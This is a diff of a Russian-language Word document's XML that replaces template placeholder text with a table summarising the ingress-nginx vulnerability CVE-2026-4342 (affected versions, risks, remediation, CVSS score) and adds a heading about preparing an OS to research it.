+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Ingress-nginx 1.14.5,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Ingress-nginx 1.15.1,</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="937"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Основной риск</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Выполнение произвольного кода в контексте </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ingress</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>nginx</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>controller</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, получение доступа к </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Kubernetes</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> S</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ecrets</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="937"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Основное последствие</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Компрометация </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ingress</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">-контроллера, раскрытие </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Secrets</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, перехват </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>https</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>-трафика.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="442"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Полное устранение</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Обновление </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ingress</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>nginx</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> до безопасных версий. Ограничение прав на работу с </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ingress</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>-</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>nginx</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="462"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>CVSS 4.0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>8.8 (</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>High)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="462"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Вектор атаки</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Network</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
         <w:ind w:left="0" w:firstLine="0"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc210601681"/>
-      <w:r>
-        <w:t>Подраздел 1</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="10"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>На рисунке 1 представлено….</w:t>
-      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">основные характеристики </w:t>
+      </w:r>
+      <w:r>
+        <w:t>CVE-2026-4342</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc231073622"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Подготовка ос для исследования </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CVE</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-2026-4342</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="25"/>
     </w:p>
     <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:object w:dxaOrig="13695" w:dyaOrig="4936" w14:anchorId="2E79E05B">
-          <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
-            <v:stroke joinstyle="miter"/>
-            <v:formulas>
-              <v:f eqn="if lineDrawn pixelLineWidth 0"/>
-              <v:f eqn="sum @0 1 0"/>
-              <v:f eqn="sum 0 0 @1"/>
-              <v:f eqn="prod @2 1 2"/>
-              <v:f eqn="prod @3 21600 pixelWidth"/>
-              <v:f eqn="prod @3 21600 pixelHeight"/>
-              <v:f eqn="sum @0 0 1"/>
-              <v:f eqn="prod @6 1 2"/>
-              <v:f eqn="prod @7 21600 pixelWidth"/>
-              <v:f eqn="sum @8 21600 0"/>
-              <v:f eqn="prod @7 21600 pixelHeight"/>
-              <v:f eqn="sum @10 21600 0"/>
-            </v:formulas>
-            <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
-            <o:lock v:ext="edit" aspectratio="t"/>
-          </v:shapetype>
-          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:429pt;height:155.25pt" o:ole="">
-            <v:imagedata r:id="rId12" o:title=""/>
-          </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.15" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1840982167" r:id="rId13"/>
-        </w:object>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Рисунок </w:t>
-      </w:r>
-      <w:r>
-        <w:t>1.1</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – Подпись к рисунку</w:t>
-      </w:r>
-    </w:p>
     <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст.</w:t>
-      </w:r>
-    </w:p>
     <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="0"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc210601682"/>
-      <w:r>
-        <w:t>Подраздел 2</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="11"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Перечисление перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>перечисление.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
